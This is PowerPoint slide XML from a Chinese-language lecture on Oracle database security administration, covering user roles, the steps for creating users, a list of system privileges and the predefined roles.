              <a:t>数据库安全有关的管理工作有安全管理员负责</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
              <a:latin typeface="宋体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="790"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t>应用开发者</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
              <a:latin typeface="宋体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="790"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t>设计和开发数据库应用；为应用程序设计和修改数据库结构；调整应用、指定应用的安全机制；估计存储空间的需求。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
              <a:latin typeface="宋体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="790"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t>应用管理员</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
              <a:latin typeface="宋体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="790"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t>普通数据库用户</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
              <a:latin typeface="宋体"/>
            </a:endParaRP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用户管理</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4006621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gn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="790"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t>应用管理员</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
              <a:latin typeface="宋体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="790"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t>在数据库应用交付使用后，通常需要有专人负责应用程序的日常维护工作；应用管理员负责发现和解决应用程序运行中出现的错误，或者把错误的信息报告给数据库管理员</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
              <a:latin typeface="宋体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="790"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t>普通数据库用户</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
              <a:latin typeface="宋体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="790"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t>录入、修改和删除数据；生成数据报表</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
              <a:latin typeface="宋体"/>
            </a:endParaRP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用户管理</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10578238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gn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="790"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>选择用户名和验证方式；</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="790"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>确定用户存储对象所需要的表空间</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="790"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>确定可以使用表空间的容量</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="790"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>指定用户的缺省空间和临时空间</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="790"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>创建用户</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="790"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>授予用户特权以及角色</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="790"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
              <a:latin typeface="宋体"/>
            </a:endParaRP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用户创建</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33770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gn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="790"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>系统权限是指对数据库系统及数据结构的操作权，如创建、删除用户、表、索引等</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="27305" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="FD6600"/>
              </a:buClr>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="607695" algn="l"/>
                <a:tab pos="608330" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" spc="195" dirty="0"/>
              <a:t>CREATE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" spc="290" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" spc="175" dirty="0"/>
              <a:t>PROCEDURE          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" spc="175" dirty="0"/>
              <a:t>在用户自己的模式中创建过程</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" spc="175" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="27305" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="620"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FD6600"/>
              </a:buClr>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="607695" algn="l"/>
                <a:tab pos="608330" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" spc="195" dirty="0"/>
              <a:t>CREATE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" spc="254" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" spc="225" dirty="0"/>
              <a:t>ROLE                   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" spc="175" dirty="0"/>
              <a:t>在用户自己的模式中创建角色 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" spc="225" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="420"/>
              </a:spcBef>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="607695" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" spc="195" dirty="0"/>
              <a:t>CREATE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" spc="95" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" spc="175" dirty="0"/>
              <a:t>SEQUENCE             </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" spc="175" dirty="0"/>
              <a:t>在用户自己的模式中创建序列</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="27305" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="819"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FD6600"/>
              </a:buClr>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="607695" algn="l"/>
                <a:tab pos="608330" algn="l"/>
                <a:tab pos="1676400" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" spc="195" dirty="0"/>
              <a:t>CREATE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" spc="114" dirty="0"/>
              <a:t>ATE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" spc="95" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" spc="130" dirty="0"/>
              <a:t>SESSION           </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" spc="175" dirty="0"/>
              <a:t>连接到数据库服务器并创建会话</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
              <a:latin typeface="宋体"/>
              <a:cs typeface="宋体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="27305" indent="0">
              <a:spcBef>
                <a:spcPts val="620"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FD6600"/>
              </a:buClr>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="607695" algn="l"/>
                <a:tab pos="608330" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" spc="195" dirty="0"/>
              <a:t>CREATE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" spc="225" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" spc="145" dirty="0"/>
              <a:t>TABLE                     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" spc="175" dirty="0"/>
              <a:t>在用户自己的模式中创建表</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" spc="145" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="27305" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="620"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FD6600"/>
              </a:buClr>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="607695" algn="l"/>
                <a:tab pos="608330" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" spc="195" dirty="0"/>
              <a:t>CREATE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" spc="220" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" spc="145" dirty="0"/>
              <a:t>TABLESPACE            </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" spc="175" dirty="0"/>
              <a:t>在用户自己的模式中创建表空间 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" spc="145" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="27305" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="520"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FD6600"/>
              </a:buClr>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="607695" algn="l"/>
                <a:tab pos="608330" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" spc="195" dirty="0"/>
              <a:t>CREATE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" spc="215" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" spc="235" dirty="0"/>
              <a:t>TRIGGER              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" spc="175" dirty="0"/>
              <a:t>在用户自己的模式中创建触发器 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" spc="235" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="27305" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="620"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FD6600"/>
              </a:buClr>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="607695" algn="l"/>
                <a:tab pos="608330" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" spc="195" dirty="0"/>
              <a:t>CREATE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" spc="315" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" spc="120" dirty="0"/>
              <a:t>USER                       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" spc="175" dirty="0"/>
              <a:t>在用户自己的模式中创建新用户 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" spc="120" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="27305" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="620"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FD6600"/>
              </a:buClr>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="607695" algn="l"/>
                <a:tab pos="608330" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" spc="195" dirty="0"/>
              <a:t>CREATE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" spc="200" dirty="0"/>
              <a:t> VIEW                    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" spc="175" dirty="0"/>
              <a:t>在用户自己的模式中创建视图</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" spc="200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="27305" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="620"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FD6600"/>
              </a:buClr>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="605155" algn="l"/>
                <a:tab pos="605790" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" spc="229" dirty="0"/>
              <a:t>DROP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" spc="-145" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" spc="145" dirty="0"/>
              <a:t>TABLESPACE               </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" spc="175" dirty="0"/>
              <a:t>在用户自己的模式中删除表空间 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" spc="145" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="27305" indent="0">
              <a:spcBef>
                <a:spcPts val="620"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FD6600"/>
              </a:buClr>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="605155" algn="l"/>
                <a:tab pos="605790" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" spc="275" dirty="0"/>
              <a:t>DROPUSER                     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" spc="175" dirty="0"/>
              <a:t>在用户自己的模式中删除用户</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="27305" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="620"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FD6600"/>
              </a:buClr>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="605155" algn="l"/>
                <a:tab pos="605790" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" spc="275" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="790"/>
              </a:spcBef>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系统权限</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3364607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gn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="790"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>系统权限：系统规定用户使用数据库的权限。（系统权限是对用户而言</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="790"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>实体权限：某种权限用户对其它用户的表或视图的存取权限。（是针对表或视图而言的）。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="790"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" spc="275" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="790"/>
              </a:spcBef>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权限分类</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3920343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gn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="790"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t>系统预定义角色</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
              <a:latin typeface="宋体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="790"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t>预定义角色是在数据库安装后，系统自动创建的一些常用的角色。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="790"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1">
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t>&gt;select * from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1">
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t>role_sys_privs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t> where role='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t>角色名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t>';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="790"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t>．</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t>CONNECT, RESOURCE, DBA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="790"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t>这些预定义角色主要是为了向后兼容。其主要是用于数据库管理。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t>oracle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t>建议用户自己设计数据库管理和安全的权限规划，而不要简单的使用这些预定角色。将来的版本中这些角色可能不会作为预定义角色。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="790"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t>．</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0">
                <a:latin typeface="宋体"/>
              </a:rPr>
              <a:t>DELETE_CATALOG_ROLE</a:t>
            </a:r>
            <a:r>
